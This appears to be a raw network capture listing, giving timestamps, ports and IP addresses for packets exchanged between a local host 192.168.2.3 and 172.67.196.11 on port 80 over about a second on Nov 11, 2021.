                                                                                                                          Nov 11, 2021 01:57:46.757328033 CET8049752172.67.196.11192.168.2.3
                                                                                                                          Nov 11, 2021 01:57:46.757334948 CET4975280192.168.2.3172.67.196.11
                                                                                                                          Nov 11, 2021 01:57:46.757368088 CET8049752172.67.196.11192.168.2.3
                                                                                                                          Nov 11, 2021 01:57:46.757412910 CET8049752172.67.196.11192.168.2.3
                                                                                                                          Nov 11, 2021 01:57:46.757421970 CET4975280192.168.2.3172.67.196.11
                                                                                                                          Nov 11, 2021 01:57:46.757455111 CET8049752172.67.196.11192.168.2.3
                                                                                                                          Nov 11, 2021 01:57:46.757497072 CET8049752172.67.196.11192.168.2.3
                                                                                                                          Nov 11, 2021 01:57:46.757530928 CET4975280192.168.2.3172.67.196.11
                                                                                                                          Nov 11, 2021 01:57:46.757543087 CET8049752172.67.196.11192.168.2.3
                                                                                                                          Nov 11, 2021 01:57:46.757586956 CET8049752172.67.196.11192.168.2.3
                                                                                                                          Nov 11, 2021 01:57:46.757597923 CET4975280192.168.2.3172.67.196.11
                                                                                                                          Nov 11, 2021 01:57:46.757632017 CET8049752172.67.196.11192.168.2.3
                                                                                                                          Nov 11, 2021 01:57:46.757675886 CET8049752172.67.196.11192.168.2.3
                                                                                                                          Nov 11, 2021 01:57:46.757692099 CET4975280192.168.2.3172.67.196.11
                                                                                                                          Nov 11, 2021 01:57:46.757719040 CET8049752172.67.196.11192.168.2.3
                                                                                                                          Nov 11, 2021 01:57:46.757767916 CET8049752172.67.196.11192.168.2.3
                                                                                                                          Nov 11, 2021 01:57:46.757769108 CET4975280192.168.2.3172.67.196.11
                                                                                                                          Nov 11, 2021 01:57:46.757811069 CET8049752172.67.196.11192.168.2.3
                                                                                                                          Nov 11, 2021 01:57:46.757848978 CET8049752172.67.196.11192.168.2.3
                                                                                                                          Nov 11, 2021 01:57:46.757879972 CET8049752172.67.196.11192.168.2.3
                                                                                                                          Nov 11, 2021 01:57:46.757910967 CET8049752172.67.196.11192.168.2.3
                                                                                                                          Nov 11, 2021 01:57:46.757945061 CET4975280192.168.2.3172.67.196.11
                                                                                                                          Nov 11, 2021 01:57:46.757961988 CET8049752172.67.196.11192.168.2.3
                                                                                                                          Nov 11, 2021 01:57:46.757972002 CET4975280192.168.2.3172.67.196.11
                                                                                                                          Nov 11, 2021 01:57:46.758011103 CET8049752172.67.196.11192.168.2.3
                                                                                                                          Nov 11, 2021 01:57:46.758027077 CET4975280192.168.2.3172.67.196.11
                                                                                                                          Nov 11, 2021 01:57:46.758064032 CET8049752172.67.196.11192.168.2.3
                                                                                                                          Nov 11, 2021 01:57:46.758085012 CET4975280192.168.2.3172.67.196.11
                                                                                                                          Nov 11, 2021 01:57:46.758111000 CET8049752172.67.196.11192.168.2.3
                                                                                                                          Nov 11, 2021 01:57:46.758121014 CET4975280192.168.2.3172.67.196.11
                                                                                                                          Nov 11, 2021 01:57:46.758166075 CET4975280192.168.2.3172.67.196.11
                                                                                                                          Nov 11, 2021 01:57:46.758169889 CET8049752172.67.196.11192.168.2.3
                                                                                                                          Nov 11, 2021 01:57:46.758219957 CET8049752172.67.196.11192.168.2.3
                                                                                                                          Nov 11, 2021 01:57:46.758227110 CET4975280192.168.2.3172.67.196.11
                                                                                                                          Nov 11, 2021 01:57:46.758269072 CET8049752172.67.196.11192.168.2.3
                                                                                                                          Nov 11, 2021 01:57:46.758275032 CET4975280192.168.2.3172.67.196.11
                                                                                                                          Nov 11, 2021 01:57:46.758317947 CET8049752172.67.196.11192.168.2.3
                                                                                                                          Nov 11, 2021 01:57:46.758348942 CET4975280192.168.2.3172.67.196.11
                                                                                                                          Nov 11, 2021 01:57:46.758366108 CET8049752172.67.196.11192.168.2.3
                                                                                                                          Nov 11, 2021 01:57:46.758367062 CET4975280192.168.2.3172.67.196.11
                                                                                                                          Nov 11, 2021 01:57:46.758414030 CET8049752172.67.196.11192.168.2.3
                                                                                                                          Nov 11, 2021 01:57:46.758420944 CET4975280192.168.2.3172.67.196.11
                                                                                                                          Nov 11, 2021 01:57:46.758462906 CET8049752172.67.196.11192.168.2.3
                                                                                                                          Nov 11, 2021 01:57:46.758466959 CET4975280192.168.2.3172.67.196.11
                                                                                                                          Nov 11, 2021 01:57:46.758512020 CET8049752172.67.196.11192.168.2.3
                                                                                                                          Nov 11, 2021 01:57:46.758516073 CET4975280192.168.2.3172.67.196.11
                                                                                                                          Nov 11, 2021 01:57:46.758560896 CET8049752172.67.196.11192.168.2.3
                                                                                                                          Nov 11, 2021 01:57:46.758569002 CET4975280192.168.2.3172.67.196.11
                                                                                                                          Nov 11, 2021 01:57:46.758611917 CET8049752172.67.196.11192.168.2.3
                                                                                                                          Nov 11, 2021 01:57:46.758622885 CET4975280192.168.2.3172.67.196.11
                                                                                                                          Nov 11, 2021 01:57:46.758662939 CET8049752172.67.196.11192.168.2.3
                                                                                                                          Nov 11, 2021 01:57:46.758668900 CET4975280192.168.2.3172.67.196.11
                                                                                                                          Nov 11, 2021 01:57:46.758712053 CET8049752172.67.196.11192.168.2.3
                                                                                                                          Nov 11, 2021 01:57:46.758718967 CET4975280192.168.2.3172.67.196.11
                                                                                                                          Nov 11, 2021 01:57:46.758759022 CET8049752172.67.196.11192.168.2.3
                                                                                                                          Nov 11, 2021 01:57:46.758765936 CET4975280192.168.2.3172.67.196.11
                                                                                                                          Nov 11, 2021 01:57:46.758810997 CET8049752172.67.196.11192.168.2.3
                                                                                                                          Nov 11, 2021 01:57:46.758861065 CET8049752172.67.196.11192.168.2.3
                                                                                                                          Nov 11, 2021 01:57:46.758908987 CET4975280192.168.2.3172.67.196.11
                                                                                                                          Nov 11, 2021 01:57:46.758910894 CET8049752172.67.196.11192.168.2.3
                                                                                                                          Nov 11, 2021 01:57:46.758920908 CET4975280192.168.2.3172.67.196.11
                                                                                                                          Nov 11, 2021 01:57:46.758928061 CET4975280192.168.2.3172.67.196.11
                                                                                                                          Nov 11, 2021 01:57:46.758958101 CET8049752172.67.196.11192.168.2.3
                                                                                                                          Nov 11, 2021 01:57:46.758965969 CET4975280192.168.2.3172.67.196.11
                                                                                                                          Nov 11, 2021 01:57:46.759011030 CET8049752172.67.196.11192.168.2.3
                                                                                                                          Nov 11, 2021 01:57:46.759011984 CET4975280192.168.2.3172.67.196.11
                                                                                                                          Nov 11, 2021 01:57:46.759058952 CET8049752172.67.196.11192.168.2.3
                                                                                                                          Nov 11, 2021 01:57:46.759066105 CET4975280192.168.2.3172.67.196.11
                                                                                                                          Nov 11, 2021 01:57:46.759108067 CET8049752172.67.196.11192.168.2.3
                                                                                                                          Nov 11, 2021 01:57:46.759113073 CET4975280192.168.2.3172.67.196.11
                                                                                                                          Nov 11, 2021 01:57:46.759155989 CET8049752172.67.196.11192.168.2.3
                                                                                                                          Nov 11, 2021 01:57:46.759170055 CET4975280192.168.2.3172.67.196.11
                                                                                                                          Nov 11, 2021 01:57:46.759210110 CET8049752172.67.196.11192.168.2.3
                                                                                                                          Nov 11, 2021 01:57:46.759213924 CET4975280192.168.2.3172.67.196.11
                                                                                                                          Nov 11, 2021 01:57:46.759258032 CET8049752172.67.196.11192.168.2.3
                                                                                                                          Nov 11, 2021 01:57:46.759262085 CET4975280192.168.2.3172.67.196.11
                                                                                                                          Nov 11, 2021 01:57:46.759309053 CET8049752172.67.196.11192.168.2.3
                                                                                                                          Nov 11, 2021 01:57:46.759313107 CET4975280192.168.2.3172.67.196.11
                                                                                                                          Nov 11, 2021 01:57:46.759356976 CET8049752172.67.196.11192.168.2.3
                                                                                                                          Nov 11, 2021 01:57:46.759362936 CET4975280192.168.2.3172.67.196.11
                                                                                                                          Nov 11, 2021 01:57:46.759407997 CET8049752172.67.196.11192.168.2.3
                                                                                                                          Nov 11, 2021 01:57:46.759433031 CET4975280192.168.2.3172.67.196.11
                                                                                                                          Nov 11, 2021 01:57:46.759455919 CET8049752172.67.196.11192.168.2.3
                                                                                                                          Nov 11, 2021 01:57:46.759459972 CET4975280192.168.2.3172.67.196.11
                                                                                                                          Nov 11, 2021 01:57:46.759505033 CET8049752172.67.196.11192.168.2.3
                                                                                                                          Nov 11, 2021 01:57:46.759511948 CET4975280192.168.2.3172.67.196.11
                                                                                                                          Nov 11, 2021 01:57:46.759553909 CET8049752172.67.196.11192.168.2.3
                                                                                                                          Nov 11, 2021 01:57:46.759557962 CET4975280192.168.2.3172.67.196.11
                                                                                                                          Nov 11, 2021 01:57:46.759603977 CET8049752172.67.196.11192.168.2.3
                                                                                                                          Nov 11, 2021 01:57:46.759609938 CET4975280192.168.2.3172.67.196.11
                                                                                                                          Nov 11, 2021 01:57:46.759650946 CET8049752172.67.196.11192.168.2.3
                                                                                                                          Nov 11, 2021 01:57:46.759660006 CET4975280192.168.2.3172.67.196.11
                                                                                                                          Nov 11, 2021 01:57:46.759700060 CET8049752172.67.196.11192.168.2.3
                                                                                                                          Nov 11, 2021 01:57:46.759711981 CET4975280192.168.2.3172.67.196.11
                                                                                                                          Nov 11, 2021 01:57:46.759751081 CET8049752172.67.196.11192.168.2.3
                                                                                                                          Nov 11, 2021 01:57:46.759754896 CET4975280192.168.2.3172.67.196.11
                                                                                                                          Nov 11, 2021 01:57:46.759799004 CET8049752172.67.196.11192.168.2.3
                                                                                                                          Nov 11, 2021 01:57:46.759804964 CET4975280192.168.2.3172.67.196.11
                                                                                                                          Nov 11, 2021 01:57:46.759850025 CET8049752172.67.196.11192.168.2.3
                                                                                                                          Nov 11, 2021 01:57:46.759855032 CET4975280192.168.2.3172.67.196.11
                                                                                                                          Nov 11, 2021 01:57:46.759896040 CET8049752172.67.196.11192.168.2.3
                                                                                                                          Nov 11, 2021 01:57:46.759903908 CET4975280192.168.2.3172.67.196.11
                                                                                                                          Nov 11, 2021 01:57:46.759948015 CET8049752172.67.196.11192.168.2.3
                                                                                                                          Nov 11, 2021 01:57:46.759973049 CET4975280192.168.2.3172.67.196.11
                                                                                                                          Nov 11, 2021 01:57:46.759994984 CET8049752172.67.196.11192.168.2.3
                                                                                                                          Nov 11, 2021 01:57:46.759996891 CET4975280192.168.2.3172.67.196.11
                                                                                                                          Nov 11, 2021 01:57:46.760045052 CET8049752172.67.196.11192.168.2.3
                                                                                                                          Nov 11, 2021 01:57:46.760050058 CET4975280192.168.2.3172.67.196.11
                                                                                                                          Nov 11, 2021 01:57:46.760092974 CET8049752172.67.196.11192.168.2.3
                                                                                                                          Nov 11, 2021 01:57:46.760097980 CET4975280192.168.2.3172.67.196.11
                                                                                                                          Nov 11, 2021 01:57:46.760143042 CET8049752172.67.196.11192.168.2.3
                                                                                                                          Nov 11, 2021 01:57:46.760148048 CET4975280192.168.2.3172.67.196.11
                                                                                                                          Nov 11, 2021 01:57:46.760190964 CET8049752172.67.196.11192.168.2.3
                                                                                                                          Nov 11, 2021 01:57:46.760200024 CET4975280192.168.2.3172.67.196.11
                                                                                                                          Nov 11, 2021 01:57:46.760241032 CET8049752172.67.196.11192.168.2.3
                                                                                                                          Nov 11, 2021 01:57:46.760258913 CET4975280192.168.2.3172.67.196.11
                                                                                                                          Nov 11, 2021 01:57:46.760293007 CET8049752172.67.196.11192.168.2.3
                                                                                                                          Nov 11, 2021 01:57:46.760301113 CET4975280192.168.2.3172.67.196.11
                                                                                                                          Nov 11, 2021 01:57:46.760343075 CET8049752172.67.196.11192.168.2.3
                                                                                                                          Nov 11, 2021 01:57:46.760346889 CET4975280192.168.2.3172.67.196.11
                                                                                                                          Nov 11, 2021 01:57:46.760391951 CET8049752172.67.196.11192.168.2.3
                                                                                                                          Nov 11, 2021 01:57:46.760397911 CET4975280192.168.2.3172.67.196.11
                                                                                                                          Nov 11, 2021 01:57:46.760438919 CET8049752172.67.196.11192.168.2.3
                                                                                                                          Nov 11, 2021 01:57:46.760446072 CET4975280192.168.2.3172.67.196.11
                                                                                                                          Nov 11, 2021 01:57:46.760488033 CET8049752172.67.196.11192.168.2.3
                                                                                                                          Nov 11, 2021 01:57:46.760519028 CET4975280192.168.2.3172.67.196.11
                                                                                                                          Nov 11, 2021 01:57:46.760535002 CET8049752172.67.196.11192.168.2.3
                                                                                                                          Nov 11, 2021 01:57:46.760536909 CET4975280192.168.2.3172.67.196.11
                                                                                                                          Nov 11, 2021 01:57:46.760585070 CET8049752172.67.196.11192.168.2.3
                                                                                                                          Nov 11, 2021 01:57:46.760592937 CET4975280192.168.2.3172.67.196.11
                                                                                                                          Nov 11, 2021 01:57:46.760633945 CET8049752172.67.196.11192.168.2.3
                                                                                                                          Nov 11, 2021 01:57:46.760641098 CET4975280192.168.2.3172.67.196.11
                                                                                                                          Nov 11, 2021 01:57:46.760680914 CET8049752172.67.196.11192.168.2.3
                                                                                                                          Nov 11, 2021 01:57:46.760689020 CET4975280192.168.2.3172.67.196.11
                                                                                                                          Nov 11, 2021 01:57:46.760730982 CET8049752172.67.196.11192.168.2.3
                                                                                                                          Nov 11, 2021 01:57:46.760735035 CET4975280192.168.2.3172.67.196.11
                                                                                                                          Nov 11, 2021 01:57:46.760781050 CET8049752172.67.196.11192.168.2.3
                                                                                                                          Nov 11, 2021 01:57:46.760799885 CET4975280192.168.2.3172.67.196.11
                                                                                                                          Nov 11, 2021 01:57:46.760828972 CET8049752172.67.196.11192.168.2.3
                                                                                                                          Nov 11, 2021 01:57:46.760834932 CET4975280192.168.2.3172.67.196.11
                                                                                                                          Nov 11, 2021 01:57:46.760885000 CET4975280192.168.2.3172.67.196.11
                                                                                                                          Nov 11, 2021 01:57:46.760900974 CET8049752172.67.196.11192.168.2.3
                                                                                                                          Nov 11, 2021 01:57:46.760948896 CET8049752172.67.196.11192.168.2.3
                                                                                                                          Nov 11, 2021 01:57:46.760958910 CET4975280192.168.2.3172.67.196.11
                                                                                                                          Nov 11, 2021 01:57:46.761009932 CET8049752172.67.196.11192.168.2.3
                                                                                                                          Nov 11, 2021 01:57:46.761018991 CET4975280192.168.2.3172.67.196.11
                                                                                                                          Nov 11, 2021 01:57:46.761059046 CET8049752172.67.196.11192.168.2.3
                                                                                                                          Nov 11, 2021 01:57:46.761065006 CET4975280192.168.2.3172.67.196.11
                                                                                                                          Nov 11, 2021 01:57:46.761107922 CET8049752172.67.196.11192.168.2.3
                                                                                                                          Nov 11, 2021 01:57:46.761113882 CET4975280192.168.2.3172.67.196.11
                                                                                                                          Nov 11, 2021 01:57:46.761157036 CET8049752172.67.196.11192.168.2.3
                                                                                                                          Nov 11, 2021 01:57:46.761164904 CET4975280192.168.2.3172.67.196.11
                                                                                                                          Nov 11, 2021 01:57:46.761209011 CET8049752172.67.196.11192.168.2.3
                                                                                                                          Nov 11, 2021 01:57:46.761214972 CET4975280192.168.2.3172.67.196.11
                                                                                                                          Nov 11, 2021 01:57:46.761257887 CET8049752172.67.196.11192.168.2.3
                                                                                                                          Nov 11, 2021 01:57:46.761265039 CET4975280192.168.2.3172.67.196.11
                                                                                                                          Nov 11, 2021 01:57:46.761306047 CET8049752172.67.196.11192.168.2.3
                                                                                                                          Nov 11, 2021 01:57:46.761312962 CET4975280192.168.2.3172.67.196.11
                                                                                                                          Nov 11, 2021 01:57:46.761356115 CET8049752172.67.196.11192.168.2.3
                                                                                                                          Nov 11, 2021 01:57:46.761363029 CET4975280192.168.2.3172.67.196.11
                                                                                                                          Nov 11, 2021 01:57:46.761404037 CET8049752172.67.196.11192.168.2.3
                                                                                                                          Nov 11, 2021 01:57:46.761410952 CET4975280192.168.2.3172.67.196.11
                                                                                                                          Nov 11, 2021 01:57:46.761451960 CET8049752172.67.196.11192.168.2.3
                                                                                                                          Nov 11, 2021 01:57:46.761460066 CET4975280192.168.2.3172.67.196.11
                                                                                                                          Nov 11, 2021 01:57:46.761507034 CET4975280192.168.2.3172.67.196.11
                                                                                                                          Nov 11, 2021 01:57:46.778305054 CET8049752172.67.196.11192.168.2.3
                                                                                                                          Nov 11, 2021 01:57:46.778338909 CET8049752172.67.196.11192.168.2.3
                                                                                                                          Nov 11, 2021 01:57:46.778376102 CET8049752172.67.196.11192.168.2.3
                                                                                                                          Nov 11, 2021 01:57:46.778399944 CET4975280192.168.2.3172.67.196.11
                                                                                                                          Nov 11, 2021 01:57:46.778414011 CET8049752172.67.196.11192.168.2.3
                                                                                                                          Nov 11, 2021 01:57:46.778431892 CET4975280192.168.2.3172.67.196.11
                                                                                                                          Nov 11, 2021 01:57:46.778441906 CET4975280192.168.2.3172.67.196.11
                                                                                                                          Nov 11, 2021 01:57:46.778451920 CET8049752172.67.196.11192.168.2.3
                                                                                                                          Nov 11, 2021 01:57:46.778462887 CET4975280192.168.2.3172.67.196.11
                                                                                                                          Nov 11, 2021 01:57:46.778489113 CET8049752172.67.196.11192.168.2.3
                                                                                                                          Nov 11, 2021 01:57:46.778506994 CET4975280192.168.2.3172.67.196.11
                                                                                                                          Nov 11, 2021 01:57:46.778525114 CET8049752172.67.196.11192.168.2.3
                                                                                                                          Nov 11, 2021 01:57:46.778538942 CET4975280192.168.2.3172.67.196.11
                                                                                                                          Nov 11, 2021 01:57:46.778563023 CET8049752172.67.196.11192.168.2.3
                                                                                                                          Nov 11, 2021 01:57:46.778580904 CET4975280192.168.2.3172.67.196.11
                                                                                                                          Nov 11, 2021 01:57:46.778597116 CET8049752172.67.196.11192.168.2.3
                                                                                                                          Nov 11, 2021 01:57:46.778613091 CET4975280192.168.2.3172.67.196.11
                                                                                                                          Nov 11, 2021 01:57:46.778634071 CET8049752172.67.196.11192.168.2.3
                                                                                                                          Nov 11, 2021 01:57:46.778640985 CET4975280192.168.2.3172.67.196.11
                                                                                                                          Nov 11, 2021 01:57:46.778669119 CET8049752172.67.196.11192.168.2.3
                                                                                                                          Nov 11, 2021 01:57:46.778691053 CET4975280192.168.2.3172.67.196.11
                                                                                                                          Nov 11, 2021 01:57:46.778706074 CET8049752172.67.196.11192.168.2.3
                                                                                                                          Nov 11, 2021 01:57:46.778714895 CET4975280192.168.2.3172.67.196.11
                                                                                                                          Nov 11, 2021 01:57:46.778737068 CET8049752172.67.196.11192.168.2.3
                                                                                                                          Nov 11, 2021 01:57:46.778759003 CET4975280192.168.2.3172.67.196.11
                                                                                                                          Nov 11, 2021 01:57:46.778772116 CET8049752172.67.196.11192.168.2.3
                                                                                                                          Nov 11, 2021 01:57:46.778808117 CET8049752172.67.196.11192.168.2.3
                                                                                                                          Nov 11, 2021 01:57:46.778842926 CET8049752172.67.196.11192.168.2.3
                                                                                                                          Nov 11, 2021 01:57:46.778871059 CET4975280192.168.2.3172.67.196.11
                                                                                                                          Nov 11, 2021 01:57:46.778877974 CET8049752172.67.196.11192.168.2.3
                                                                                                                          Nov 11, 2021 01:57:46.778884888 CET4975280192.168.2.3172.67.196.11
                                                                                                                          Nov 11, 2021 01:57:46.778893948 CET4975280192.168.2.3172.67.196.11
                                                                                                                          Nov 11, 2021 01:57:46.778901100 CET4975280192.168.2.3172.67.196.11
                                                                                                                          Nov 11, 2021 01:57:46.778915882 CET8049752172.67.196.11192.168.2.3
                                                                                                                          Nov 11, 2021 01:57:46.778919935 CET4975280192.168.2.3172.67.196.11
                                                                                                                          Nov 11, 2021 01:57:46.778949022 CET8049752172.67.196.11192.168.2.3
                                                                                                                          Nov 11, 2021 01:57:46.778991938 CET8049752172.67.196.11192.168.2.3
                                                                                                                          Nov 11, 2021 01:57:46.778995991 CET4975280192.168.2.3172.67.196.11
                                                                                                                          Nov 11, 2021 01:57:46.779006958 CET4975280192.168.2.3172.67.196.11
                                                                                                                          Nov 11, 2021 01:57:46.779026985 CET8049752172.67.196.11192.168.2.3
                                                                                                                          Nov 11, 2021 01:57:46.779055119 CET4975280192.168.2.3172.67.196.11
                                                                                                                          Nov 11, 2021 01:57:46.779062986 CET8049752172.67.196.11192.168.2.3
                                                                                                                          Nov 11, 2021 01:57:46.779071093 CET4975280192.168.2.3172.67.196.11
                                                                                                                          Nov 11, 2021 01:57:46.779098988 CET8049752172.67.196.11192.168.2.3
                                                                                                                          Nov 11, 2021 01:57:46.779115915 CET4975280192.168.2.3172.67.196.11
                                                                                                                          Nov 11, 2021 01:57:46.779135942 CET8049752172.67.196.11192.168.2.3
                                                                                                                          Nov 11, 2021 01:57:46.779144049 CET4975280192.168.2.3172.67.196.11
                                                                                                                          Nov 11, 2021 01:57:46.779170036 CET8049752172.67.196.11192.168.2.3
                                                                                                                          Nov 11, 2021 01:57:46.779211998 CET8049752172.67.196.11192.168.2.3
                                                                                                                          Nov 11, 2021 01:57:46.779227972 CET4975280192.168.2.3172.67.196.11
                                                                                                                          Nov 11, 2021 01:57:46.779244900 CET4975280192.168.2.3172.67.196.11
                                                                                                                          Nov 11, 2021 01:57:46.779254913 CET8049752172.67.196.11192.168.2.3
                                                                                                                          Nov 11, 2021 01:57:46.779268026 CET4975280192.168.2.3172.67.196.11
                                                                                                                          Nov 11, 2021 01:57:46.779294014 CET8049752172.67.196.11192.168.2.3
                                                                                                                          Nov 11, 2021 01:57:46.779313087 CET4975280192.168.2.3172.67.196.11
                                                                                                                          Nov 11, 2021 01:57:46.779334068 CET8049752172.67.196.11192.168.2.3
                                                                                                                          Nov 11, 2021 01:57:46.779351950 CET4975280192.168.2.3172.67.196.11
                                                                                                                          Nov 11, 2021 01:57:46.779367924 CET8049752172.67.196.11192.168.2.3
                                                                                                                          Nov 11, 2021 01:57:46.779395103 CET4975280192.168.2.3172.67.196.11
                                                                                                                          Nov 11, 2021 01:57:46.779405117 CET8049752172.67.196.11192.168.2.3
                                                                                                                          Nov 11, 2021 01:57:46.779412031 CET4975280192.168.2.3172.67.196.11
                                                                                                                          Nov 11, 2021 01:57:46.779439926 CET8049752172.67.196.11192.168.2.3
                                                                                                                          Nov 11, 2021 01:57:46.779462099 CET4975280192.168.2.3172.67.196.11
                                                                                                                          Nov 11, 2021 01:57:46.779474974 CET8049752172.67.196.11192.168.2.3
                                                                                                                          Nov 11, 2021 01:57:46.779489994 CET4975280192.168.2.3172.67.196.11
                                                                                                                          Nov 11, 2021 01:57:46.779510975 CET8049752172.67.196.11192.168.2.3
                                                                                                                          Nov 11, 2021 01:57:46.779531002 CET4975280192.168.2.3172.67.196.11
                                                                                                                          Nov 11, 2021 01:57:46.779550076 CET8049752172.67.196.11192.168.2.3
                                                                                                                          Nov 11, 2021 01:57:46.779563904 CET4975280192.168.2.3172.67.196.11
                                                                                                                          Nov 11, 2021 01:57:46.779588938 CET8049752172.67.196.11192.168.2.3
                                                                                                                          Nov 11, 2021 01:57:46.779603958 CET4975280192.168.2.3172.67.196.11
                                                                                                                          Nov 11, 2021 01:57:46.779625893 CET8049752172.67.196.11192.168.2.3
                                                                                                                          Nov 11, 2021 01:57:46.779645920 CET4975280192.168.2.3172.67.196.11
                                                                                                                          Nov 11, 2021 01:57:46.779660940 CET8049752172.67.196.11192.168.2.3
                                                                                                                          Nov 11, 2021 01:57:46.779675961 CET4975280192.168.2.3172.67.196.11
                                                                                                                          Nov 11, 2021 01:57:46.779697895 CET8049752172.67.196.11192.168.2.3
                                                                                                                          Nov 11, 2021 01:57:46.779715061 CET4975280192.168.2.3172.67.196.11
                                                                                                                          Nov 11, 2021 01:57:46.779733896 CET8049752172.67.196.11192.168.2.3
                                                                                                                          Nov 11, 2021 01:57:46.779742002 CET4975280192.168.2.3172.67.196.11
                                                                                                                          Nov 11, 2021 01:57:46.779771090 CET8049752172.67.196.11192.168.2.3
                                                                                                                          Nov 11, 2021 01:57:46.779784918 CET4975280192.168.2.3172.67.196.11
                                                                                                                          Nov 11, 2021 01:57:46.779808044 CET8049752172.67.196.11192.168.2.3
                                                                                                                          Nov 11, 2021 01:57:46.779823065 CET4975280192.168.2.3172.67.196.11
                                                                                                                          Nov 11, 2021 01:57:46.779844046 CET8049752172.67.196.11192.168.2.3
                                                                                                                          Nov 11, 2021 01:57:46.779867887 CET4975280192.168.2.3172.67.196.11
                                                                                                                          Nov 11, 2021 01:57:46.779882908 CET8049752172.67.196.11192.168.2.3
                                                                                                                          Nov 11, 2021 01:57:46.779886007 CET4975280192.168.2.3172.67.196.11
                                                                                                                          Nov 11, 2021 01:57:46.779917955 CET8049752172.67.196.11192.168.2.3
                                                                                                                          Nov 11, 2021 01:57:46.779936075 CET4975280192.168.2.3172.67.196.11
                                                                                                                          Nov 11, 2021 01:57:46.779953957 CET8049752172.67.196.11192.168.2.3
                                                                                                                          Nov 11, 2021 01:57:46.779968977 CET4975280192.168.2.3172.67.196.11
                                                                                                                          Nov 11, 2021 01:57:46.779989958 CET8049752172.67.196.11192.168.2.3
                                                                                                                          Nov 11, 2021 01:57:46.780009031 CET4975280192.168.2.3172.67.196.11
                                                                                                                          Nov 11, 2021 01:57:46.780025959 CET8049752172.67.196.11192.168.2.3
                                                                                                                          Nov 11, 2021 01:57:46.780035973 CET4975280192.168.2.3172.67.196.11
                                                                                                                          Nov 11, 2021 01:57:46.780061960 CET8049752172.67.196.11192.168.2.3
                                                                                                                          Nov 11, 2021 01:57:46.780080080 CET4975280192.168.2.3172.67.196.11
                                                                                                                          Nov 11, 2021 01:57:46.780102015 CET8049752172.67.196.11192.168.2.3
                                                                                                                          Nov 11, 2021 01:57:46.780121088 CET4975280192.168.2.3172.67.196.11
                                                                                                                          Nov 11, 2021 01:57:46.780138016 CET8049752172.67.196.11192.168.2.3
                                                                                                                          Nov 11, 2021 01:57:46.780148983 CET4975280192.168.2.3172.67.196.11
                                                                                                                          Nov 11, 2021 01:57:46.780173063 CET8049752172.67.196.11192.168.2.3
                                                                                                                          Nov 11, 2021 01:57:46.780213118 CET4975280192.168.2.3172.67.196.11
                                                                                                                          Nov 11, 2021 01:57:46.780216932 CET8049752172.67.196.11192.168.2.3
                                                                                                                          Nov 11, 2021 01:57:46.780225039 CET4975280192.168.2.3172.67.196.11
                                                                                                                          Nov 11, 2021 01:57:46.780250072 CET8049752172.67.196.11192.168.2.3
                                                                                                                          Nov 11, 2021 01:57:46.780272007 CET4975280192.168.2.3172.67.196.11
                                                                                                                          Nov 11, 2021 01:57:46.780287981 CET8049752172.67.196.11192.168.2.3
                                                                                                                          Nov 11, 2021 01:57:46.780297041 CET4975280192.168.2.3172.67.196.11
                                                                                                                          Nov 11, 2021 01:57:46.780329943 CET8049752172.67.196.11192.168.2.3
                                                                                                                          Nov 11, 2021 01:57:46.780344963 CET4975280192.168.2.3172.67.196.11
                                                                                                                          Nov 11, 2021 01:57:46.780368090 CET8049752172.67.196.11192.168.2.3
                                                                                                                          Nov 11, 2021 01:57:46.780385971 CET4975280192.168.2.3172.67.196.11
                                                                                                                          Nov 11, 2021 01:57:46.780402899 CET8049752172.67.196.11192.168.2.3
                                                                                                                          Nov 11, 2021 01:57:46.780417919 CET4975280192.168.2.3172.67.196.11
                                                                                                                          Nov 11, 2021 01:57:46.780438900 CET8049752172.67.196.11192.168.2.3
                                                                                                                          Nov 11, 2021 01:57:46.780457973 CET4975280192.168.2.3172.67.196.11
                                                                                                                          Nov 11, 2021 01:57:46.780472994 CET8049752172.67.196.11192.168.2.3
                                                                                                                          Nov 11, 2021 01:57:46.780488968 CET4975280192.168.2.3172.67.196.11
                                                                                                                          Nov 11, 2021 01:57:46.780512094 CET8049752172.67.196.11192.168.2.3
                                                                                                                          Nov 11, 2021 01:57:46.780529022 CET4975280192.168.2.3172.67.196.11
                                                                                                                          Nov 11, 2021 01:57:46.780546904 CET8049752172.67.196.11192.168.2.3
                                                                                                                          Nov 11, 2021 01:57:46.780566931 CET4975280192.168.2.3172.67.196.11
                                                                                                                          Nov 11, 2021 01:57:46.780586004 CET8049752172.67.196.11192.168.2.3
                                                                                                                          Nov 11, 2021 01:57:46.780594110 CET4975280192.168.2.3172.67.196.11
                                                                                                                          Nov 11, 2021 01:57:46.780622005 CET8049752172.67.196.11192.168.2.3
                                                                                                                          Nov 11, 2021 01:57:46.780637026 CET4975280192.168.2.3172.67.196.11
                                                                                                                          Nov 11, 2021 01:57:46.780657053 CET8049752172.67.196.11192.168.2.3
                                                                                                                          Nov 11, 2021 01:57:46.780678988 CET4975280192.168.2.3172.67.196.11
                                                                                                                          Nov 11, 2021 01:57:46.780693054 CET8049752172.67.196.11192.168.2.3
                                                                                                                          Nov 11, 2021 01:57:46.780708075 CET4975280192.168.2.3172.67.196.11
                                                                                                                          Nov 11, 2021 01:57:46.780730009 CET8049752172.67.196.11192.168.2.3
                                                                                                                          Nov 11, 2021 01:57:46.780746937 CET4975280192.168.2.3172.67.196.11
                                                                                                                          Nov 11, 2021 01:57:46.780769110 CET8049752172.67.196.11192.168.2.3
                                                                                                                          Nov 11, 2021 01:57:46.780786037 CET4975280192.168.2.3172.67.196.11
                                                                                                                          Nov 11, 2021 01:57:46.780808926 CET8049752172.67.196.11192.168.2.3
                                                                                                                          Nov 11, 2021 01:57:46.780822992 CET4975280192.168.2.3172.67.196.11
                                                                                                                          Nov 11, 2021 01:57:46.780862093 CET8049752172.67.196.11192.168.2.3
                                                                                                                          Nov 11, 2021 01:57:46.780864954 CET4975280192.168.2.3172.67.196.11
                                                                                                                          Nov 11, 2021 01:57:46.780909061 CET8049752172.67.196.11192.168.2.3
                                                                                                                          Nov 11, 2021 01:57:46.780915976 CET4975280192.168.2.3172.67.196.11
                                                                                                                          Nov 11, 2021 01:57:46.780944109 CET8049752172.67.196.11192.168.2.3
                                                                                                                          Nov 11, 2021 01:57:46.780960083 CET4975280192.168.2.3172.67.196.11
                                                                                                                          Nov 11, 2021 01:57:46.780977964 CET8049752172.67.196.11192.168.2.3
                                                                                                                          Nov 11, 2021 01:57:46.780993938 CET4975280192.168.2.3172.67.196.11
                                                                                                                          Nov 11, 2021 01:57:46.781014919 CET8049752172.67.196.11192.168.2.3
                                                                                                                          Nov 11, 2021 01:57:46.781034946 CET4975280192.168.2.3172.67.196.11
